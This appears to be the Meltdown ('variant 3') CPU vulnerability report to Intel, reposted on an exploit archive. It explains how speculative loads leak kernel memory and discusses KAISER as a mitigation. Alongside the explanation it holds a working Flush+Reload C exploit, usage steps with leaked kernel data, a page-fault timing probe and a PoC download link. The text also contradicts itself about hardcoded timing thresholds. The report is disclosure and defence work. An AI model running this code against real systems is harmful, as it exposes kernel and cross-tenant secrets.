== INTRODUCTION ==
This is a bug report about a CPU security issue that affects
processors by Intel, AMD and (to some extent) ARM.
I have written a PoC for this issue that, when executed in userspace
on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
can leak around 2000 bytes per second from Linux kernel memory after a
~4-second startup, in a 4GiB address space window, with the ability to
read from random offsets in that window. The same thing also works on
an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
On the Intel CPU, I also have preliminary results that suggest that it
may be possible to leak host memory (which would include memory owned
by other guests) from inside a KVM guest.
The attack doesn't seem to work as well on ARM - perhaps because ARM
CPUs don't perform as much speculative execution, possibly due to a
different performance/energy tradeoff?
All PoCs are written against specific processors and will likely
require at least some adjustments before they can run in other
environments, e.g. because of hardcoded timing thresholds.
On the following Intel CPUs (the only ones tested so far), we managed
to leak information using another variant of this issue ("variant 3"):

- Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
- Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)

So far, we have not managed to leak information this way on AMD or ARM CPUs.
Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
speculative execution have something like the following behavior:

- If the address is not mapped (perhaps also under other conditions?),
  instructions that depend on the load are not executed.
- If the address is mapped, but not sufficiently cached, the load loads zeroes.
  Instructions that depend on the load are executed.
  Perhaps Intel decided that in case of a sufficiently high-latency load,
  it makes sense to speculate ahead with a dummy value to get a chance to
  prefetch cachelines for dependent loads, or something like that?
- If the address is sufficiently cached, the load loads the data stored at the
  given address, without respecting the privilege level.
  Instructions that depend on the load are executed.
  This is the vulnerable case.
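The third (vulnerable) case can be probed from userspace with a classic
Flush+Reload covert channel. Below is a minimal sketch of that measurement
idea, not the attached PoC: it dereferences a kernel address, lets the
dependent speculative access touch one page of a probe array, and then times
accesses to each probe page to see which one became cached. The file name,
build command, 120-cycle cache-hit threshold and SIGSEGV-based recovery are
my assumptions and will need per-machine adjustment.

=====
/* spec_probe.c - minimal Flush+Reload sketch (assumed build: gcc -O2 -o spec_probe spec_probe.c) */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <x86intrin.h>

#define STRIDE 4096  /* one page per byte value, to sidestep the prefetcher */
static uint8_t probe_array[256 * STRIDE];
static sigjmp_buf recover;

static void segv_handler(int sig) {
    (void)sig;
    siglongjmp(recover, 1);  /* the load still faults architecturally */
}

/* Time one access to decide whether the line is cached. */
static uint64_t access_time(volatile uint8_t *p) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - start;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <kernel address (hex)>\n", argv[0]);
        return 1;
    }
    volatile uint8_t *kernel_ptr =
        (volatile uint8_t *)strtoull(argv[1], NULL, 16);
    signal(SIGSEGV, segv_handler);
    memset(probe_array, 1, sizeof(probe_array));  /* fault the pages in */

    /* Flush the probe pages so only a speculative, secret-dependent access
     * can bring one of them back into the cache. */
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe_array[i * STRIDE]);

    if (sigsetjmp(recover, 1) == 0) {
        /* Architecturally this faults, but instructions depending on the
         * load may still execute speculatively and touch one probe page. */
        uint8_t value = *kernel_ptr;
        *(volatile uint8_t *)&probe_array[value * STRIDE];
    }

    /* Reload phase: a fast access reveals which index, if any, was touched.
     * The 120-cycle threshold is a guess; calibrate it per CPU. */
    for (int i = 0; i < 256; i++)
        if (access_time(&probe_array[i * STRIDE]) < 120)
            printf("candidate byte value: 0x%02x\n", i);
    return 0;
}
=====

On an affected CPU with the target line cached, the reported candidate should
match the byte at the given address; with the line uncached, it should come
out as 0x00, matching the zero-filled behavior described above.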
I have attached a PoC that works on both tested Intel systems, named
intel_kernel_read_poc.tar. Usage:
As root, determine where the core_pattern is in the kernel:

=====
# grep core_pattern /proc/kallsyms
ffffffff81e8aea0 D core_pattern
=====
Then, as a normal user, unpack the PoC and use it to leak the
core_pattern (and potentially other cached things around it) from
kernel memory, using the pointer from the previous step:

=====
$ cat /proc/sys/kernel/core_pattern
/cores/%E.%p.%s.%t
$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
ffffffff81e8aea0  2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e  |/cores/%E.%p.%s.|
ffffffff81e8aeb0  25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20  |%t.apport %p %s |
ffffffff81e8aec0  25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00  |%c %P...........|
[ zeroes ]
ffffffff81e8af20  c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff  |................|
ffffffff81e8af30  20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff  | .......u.......|
[ zeroes ]
ffffffff81e8bb60  65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00  |e[..............|
ffffffff81e8bb70  00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00  |....mA..........|
[ zeroes ]
real 0m13.726s
user 0m9.820s
sys 0m3.908s
=====
As you can see, the core_pattern, part of the previous core_pattern (behind the
first null byte) and a few kernel pointers were leaked.
To confirm whether other leaked kernel data was leaked correctly, use gdb as
root to read kernel memory:

=====
# gdb /bin/sleep /proc/kcore
[...]
(gdb) x/4gx 0xffffffff81e8af20
0xffffffff81e8af20:     0xffffffff81e8a4c0      0xffffffff81e8afc0
0xffffffff81e8af30:     0xffffffff81f08e20      0xffffffff81cdd975
(gdb) x/4gx 0xffffffff81e8bb60
0xffffffff81e8bb60:     0xffffffff81cf5b65      0x0000000000000000
0xffffffff81e8bb70:     0x0000416d00000000      0x0000000000000000
=====
Note that the PoC will report uncached bytes as zeroes.
To Intel:
Please tell me if you have trouble reproducing this issue.
Given how different my two test machines are, I would be surprised if this
didn't just work out of the box on other CPUs from the same generation.
This PoC doesn't have hardcoded timings or anything like that.
We have not yet tested whether this still works after a TLB flush.
Regarding possible mitigations:
A short while ago, Daniel Gruss presented KAISER:
https://gruss.cc/files/kaiser.pdf
https://lkml.org/lkml/2017/5/4/220 (cached:
https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
)
https://github.com/IAIK/KAISER
Basically, the issue that KAISER tries to mitigate is that on Intel
CPUs, the timing of a pagefault reveals whether the address is
unmapped or mapped as kernel-only (because for an unmapped address, a
pagetable walk has to occur, while for a mapped address, the TLB can be
used). KAISER duplicates the top-level pagetables of all processes and
switches them on kernel entry and exit. The kernel's top-level
pagetable looks as before. In the top-level pagetable used while
executing userspace code, most entries that are only used by the
kernel are zeroed out, except for the kernel text and stack that are
necessary to execute the syscall/exception entry code that has to
switch back the pagetable.
I suspect that this approach might also be usable for mitigating
variant 3, but I don't know how much TLB flushing / data cache
flushing would be necessary to make it work.
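For illustration, here is a minimal sketch of the page-fault timing
measurement that KAISER is meant to defeat; this is my own illustration under
stated assumptions, not part of KAISER or of the attached PoC. It averages
the user-visible round-trip time of a faulting access to a candidate address;
without KAISER, an address that is mapped kernel-only should fault somewhat
faster than an unmapped one, since the translation can come from the TLB
instead of a pagetable walk. The file name, build command and iteration count
are placeholders.

=====
/* fault_timing.c - fault round-trip timing sketch (assumed build: gcc -O2 -o fault_timing fault_timing.c) */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <signal.h>
#include <setjmp.h>
#include <x86intrin.h>

static sigjmp_buf recover;

static void segv_handler(int sig) {
    (void)sig;
    siglongjmp(recover, 1);  /* resume after the faulting access */
}

/* Cycles spent between issuing the faulting access and regaining control. */
static uint64_t time_faulting_access(volatile uint8_t *p) {
    unsigned int aux;
    uint64_t start = __rdtscp(&aux);
    if (sigsetjmp(recover, 1) == 0)
        (void)*p;  /* always faults when executed from ring 3 */
    return __rdtscp(&aux) - start;
}

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <address (hex)>\n", argv[0]);
        return 1;
    }
    volatile uint8_t *target =
        (volatile uint8_t *)strtoull(argv[1], NULL, 16);
    signal(SIGSEGV, segv_handler);

    /* Average over many runs: signal delivery adds a lot of noise, and the
     * mapped/unmapped difference is only a small shift in the mean. */
    const int runs = 100000;
    uint64_t total = 0;
    for (int i = 0; i < runs; i++)
        total += time_faulting_access(target);
    printf("average fault round-trip: %llu cycles\n",
           (unsigned long long)(total / runs));
    return 0;
}
=====

Comparing the average for an address known to be mapped kernel-only (e.g. a
symbol from /proc/kallsyms) against one in an unmapped hole should show the
signal that KAISER removes by unmapping almost all kernel pages while
userspace code runs.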
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43490.zip